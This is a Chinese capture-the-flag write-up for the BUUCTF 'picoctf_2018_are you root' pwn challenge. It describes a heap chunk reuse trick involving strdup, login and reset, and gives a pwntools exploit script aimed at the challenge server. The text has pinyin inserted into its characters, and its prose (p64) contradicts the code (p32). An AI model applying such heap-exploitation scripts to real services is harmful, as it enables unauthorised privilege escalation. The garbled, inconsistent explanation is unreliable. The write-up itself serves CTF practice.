strdup: malloc一個(gè)參數(shù)字符串大小的內(nèi)存,并且將字符串拷貝進(jìn)去.

思路

利用login, 將我們想要的數(shù)據(jù)排列好, *(v6 + 2), 其實(shí)就是v6[2], 每四個(gè)字節(jié)就是一個(gè)數(shù)據(jù) 所以字符只需要是
’aaaaaaaa’ + p64(0x5), 注意大小應(yīng)該是0x10, 這樣最好,可以百分百申請(qǐng)回來 將其釋放掉

重新申請(qǐng)回來這樣就不是 * v6指向它了而是v6指向它了

from pwn import * p = remote('node3.buuoj.cn',27037) p.sendlineafter('>','login ' + 'a'*0x8 + p32(0x5) + 'aaaa') p.sendlineafter('>','reset') p.sendlineafter('>','login aa') p.sendlineafter('>','get-flag') p.interactive()

總結(jié)

以上是生活随笔為你收集整理的BUUCTF(pwn)picoctf_2018_are you root的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。